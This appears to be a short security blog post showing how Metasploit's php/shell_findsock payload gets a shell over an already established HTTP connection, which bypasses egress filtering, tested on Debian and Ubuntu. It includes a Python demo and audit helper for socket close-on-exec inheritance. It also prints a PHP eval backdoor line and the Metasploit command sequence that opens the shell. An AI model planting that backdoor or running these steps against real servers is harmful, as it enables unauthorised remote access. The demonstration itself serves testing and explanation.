Back|Track, Debian, Metasploit, OpenSourceSoftware, Security, Ubuntu

Spawning a shell on the established connection to the webserver in Metasploit.

A good firewall setup has both ingress and egress filtering. On a new setup I like to set very strict rules for incoming and outgoing traffic. When setting up a new LAMP server, making sure it can only connect out to the places it actually needs access to is good security practice. Then open port 80 for connections from the world, minus .ru and .cn etc 🙂

So I thought…

Then egypt, from Metasploit, built the “php/shell_findsock” payload and showed it to me, and I think it is awesome!

If you can get the LAMP server to execute the shell_findsock payload in some way, you can in many cases get a shell over the already established HTTP connection! You can also use the payload with other PHP exploits in the framework.

egypt states that “this payload leaves conspicuous evil-looking entries in the apache error logs”, but I did not get any on my Debian Etch test server. On my Ubuntu Intrepid, however, I got:
sh: Syntax error: Bad fd number
Invalid method in request exit

egypt also states: “The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache.”
My test on a plain fresh install of Ubuntu 8.10 (Intrepid Ibex) shows that it works.
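Added example, not from the post and not Metasploit's own code: the root cause egypt names is that a socket without the close-on-exec flag survives exec() into whatever the web server process spawns. The script below shows both states using a local socket pair in place of a real Apache client connection, and includes an audit helper that lists a process's own socket descriptors lacking FD_CLOEXEC. It assumes Python 3 on Linux/Unix.

```python
import fcntl
import os
import socket
import stat
import subprocess
import sys

# Stand-in for the shell PHP spawns: try to use the descriptor number it was
# given and exit 0 only if that fd is still open and writable after exec().
CHILD = """
import os, sys
try:
    os.write(int(sys.argv[1]), b"child can write to the inherited socket")
except OSError:
    sys.exit(1)
"""

def socket_survives_exec(close_on_exec: bool) -> bool:
    """Connect a socket pair (stand-in for the HTTP client connection), exec()
    a child, and report whether the child could use the parent's socket.
    close_on_exec=False mimics the unpatched Apache behaviour in the post."""
    server, client = socket.socketpair()
    os.set_inheritable(server.fileno(), not close_on_exec)
    # close_fds=False so only the FD_CLOEXEC flag decides what the child inherits
    rc = subprocess.run([sys.executable, "-c", CHILD, str(server.fileno())],
                        close_fds=False).returncode
    server.close()
    client.settimeout(2)
    try:
        got = client.recv(64) if rc == 0 else b""
    except OSError:  # timeout or reset: nothing arrived from the child
        got = b""
    client.close()
    return rc == 0 and got.startswith(b"child can write")

def leaky_socket_fds(max_fd: int = 1024) -> list:
    """Audit helper for a running process: which of its open socket descriptors
    lack FD_CLOEXEC and would therefore leak into anything it exec()s?"""
    leaky = []
    for fd in range(max_fd):
        try:
            st = os.fstat(fd)
            flags = fcntl.fcntl(fd, fcntl.F_GETFD)
        except OSError:
            continue  # not an open descriptor
        if stat.S_ISSOCK(st.st_mode) and not flags & fcntl.FD_CLOEXEC:
            leaky.append(fd)
    return leaky

if __name__ == "__main__":
    print("socket leaks without close-on-exec:", socket_survives_exec(False))
    print("socket leaks with close-on-exec:   ", socket_survives_exec(True))
```

The hardened case is what a patched Apache (or any server that opens sockets with SOCK_CLOEXEC) gives you: the spawned child simply has no usable descriptor for the client connection.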

In the test case, I left my “backdoor” on the server in test.php with the code <?php eval($_GET['evalme']); ?>, which would be the default for this Metasploit setup.
Short version:

msf > use exploit/unix/webapp/php_eval
msf exploit(php_eval) > set PAYLOAD php/shell_findsock
msf exploit(php_eval) > set RHOST
msf exploit(php_eval) > exploit

Metasploit with payload php/shell_findsock

And you thought that you were safe!

On my Debian Etch, the Suhosin patch stopped the attack, but it did not on my Ubuntu Intrepid.

